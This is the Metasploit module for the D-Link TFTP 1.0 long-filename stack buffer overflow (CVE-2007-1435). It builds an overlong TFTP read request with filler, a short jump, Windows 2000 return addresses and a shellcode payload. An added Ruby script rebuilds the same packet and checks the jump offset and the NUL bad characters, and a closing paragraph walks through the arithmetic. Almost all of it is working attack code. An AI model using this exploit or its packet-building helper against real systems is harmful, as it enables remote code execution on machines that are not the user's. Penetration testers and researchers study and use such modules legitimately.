GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/tftp/dlink_long_filename.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link TFTP 1.0 Long Filename Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in D-Link TFTP 1.0.
        By sending a request for an overly long file name, an attacker
        could overflow a buffer and execute arbitrary code. For best results,
        use bind payloads with nonx (No NX).
      },
      'Author'         =>
        [
          'LSO <lso[at]hushmail.com>', # Exploit module
          'aushack',                   # Refs, stability, targets etc
        ],
      'References'     =>
        [
          [ 'CVE', '2007-1435' ],
          [ 'OSVDB', '33977' ],
          [ 'BID', '22923' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00",
          'Compat'   =>
            {
              'ConnectionType' => '-reverse',
            },
        },
      'SaveRegisters'  => [ 'ecx', 'eax', 'esi' ],
      'Platform'       => 'win',

      'Targets'        =>
        [
          # Patrick tested OK 20090228
          ['Windows 2000 SP4 English', { 'Ret' => 0x77e1ccf7 } ], # jmp ebx
          ['Windows 2000 SP3 English', { 'Ret' => 0x77f8361b } ], # jmp ebx
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2007-03-12',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(69)
      ], self)
  end

  def exploit
    connect_udp

    print_status("Trying target #{target.name}...")

    # TFTP read request (opcode 0x0001) carrying an overly long file name:
    # 581 bytes of filler, a two-byte short jump, 38 more bytes of filler,
    # the overwritten return address (a jmp ebx in the target), then the payload.
    juju = "\x00\x01"
    juju << Rex::Text.rand_text_alpha_upper(581)
    juju << Rex::Arch::X86.jmp_short(42)
    juju << Rex::Text.rand_text_alpha_upper(38)
    juju << [target.ret].pack('V') + payload.encoded

    udp_sock.put(juju)

    handler
    disconnect_udp
  end
end
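The packet the module's exploit method builds is a TFTP read request whose file name field runs on for hundreds of bytes. The following Ruby is an added example, not code from the Metasploit module or from Rex: it rebuilds the same layout from the module's own constants (581 bytes of filler, a short jump, 38 bytes of filler, a 4-byte return address, the payload), parses it the way a TFTP server would, and runs the pre-flight checks a practitioner would want before sending it, namely that the `jmp short 42` really lands on the first payload byte and that no NUL appears before or inside the payload. `rand_text_alpha_upper` and `jmp_short` are local stand-ins for the Rex helpers (Rex is not available outside Metasploit), and the INT3 sled used as a payload is a constructed placeholder, not a real shellcode.

```ruby
# Added example: rebuild and sanity-check the TFTP RRQ overflow layout used by
# the D-Link TFTP 1.0 module. Not part of the module; Rex helpers are stand-ins.

OPCODE_RRQ = "\x00\x01".b   # TFTP opcode 1 = read request

# Stand-in for Rex::Text.rand_text_alpha_upper: n random bytes from A..Z.
def rand_text_alpha_upper(n)
  Array.new(n) { ('A'.ord + rand(26)).chr }.join.b
end

# Stand-in for Rex::Arch::X86.jmp_short: EB <rel8>. The displacement is
# relative to the instruction that follows the two-byte jump.
def jmp_short(rel)
  raise ArgumentError, "rel8 out of range" unless (-128..127).cover?(rel)
  [0xEB, rel & 0xFF].pack('CC')
end

# Layout constants copied from the module's exploit method.
FILLER1 = 581
JMP_REL = 42
FILLER2 = 38
PAYLOAD_SPACE = 1024   # 'Space' from the module's Payload hash

# Build the overflow packet exactly as the module does.
def build_rrq_overflow(ret, shellcode)
  pkt = OPCODE_RRQ.dup
  pkt << rand_text_alpha_upper(FILLER1)
  pkt << jmp_short(JMP_REL)
  pkt << rand_text_alpha_upper(FILLER2)
  pkt << [ret].pack('V') << shellcode.b
  pkt
end

# Byte offsets (from the start of the UDP payload) where each part lands.
def layout
  jmp_off     = OPCODE_RRQ.bytesize + FILLER1
  ret_off     = jmp_off + 2 + FILLER2
  payload_off = ret_off + 4
  { jmp: jmp_off, ret: ret_off, payload: payload_off,
    jmp_target: jmp_off + 2 + JMP_REL }   # EB xx jumps from the next instruction
end

# Parse the request the way a TFTP server does (RFC 1350): a 2-byte opcode,
# a NUL-terminated file name, then a NUL-terminated mode string.
def parse_rrq(pkt)
  opcode = pkt.byteslice(0, 2).unpack1('n')
  parts  = pkt.byteslice(2..-1).split("\x00".b, 3)
  { opcode: opcode, filename_len: (parts[0] || "".b).bytesize, mode: parts[1] }
end

# Pre-flight checks. Returns a list of problems; empty means the packet is
# consistent with the module's layout and its BadChars of "\x00".
def check_packet(pkt, shellcode)
  l = layout
  problems = []
  unless l[:jmp_target] == l[:payload]
    problems << "short jump lands at #{l[:jmp_target]}, payload starts at #{l[:payload]}"
  end
  head = pkt.byteslice(2, l[:payload] - 2)   # filler, jmp, filler, ret
  problems << "NUL before payload truncates the file name" if head.include?("\x00".b)
  problems << "NUL in payload truncates the file name" if shellcode.b.include?("\x00".b)
  problems << "payload exceeds Space (#{PAYLOAD_SPACE})" if shellcode.bytesize > PAYLOAD_SPACE
  problems
end

if __FILE__ == $PROGRAM_NAME
  sled = "\xCC".b * 16                     # constructed placeholder payload (INT3 sled)
  pkt  = build_rrq_overflow(0x77e1ccf7, sled)   # Windows 2000 SP4 target's jmp ebx
  puts "layout: #{layout.inspect}"
  puts "server sees: #{parse_rrq(pkt).inspect}"
  puts "problems: #{check_packet(pkt, sled).inspect}"
end
```

The arithmetic is the part worth seeing: the jump sits at offset 583, its displacement is counted from offset 585, and 585 + 42 = 627, which is exactly where the payload begins after the 38-byte filler and the 4-byte return address. The NUL checks explain the module's `BadChars`: the server reads the file name as a C string, so any zero byte ends the copy and everything after it, including the return address or the rest of the shellcode, never reaches the stack.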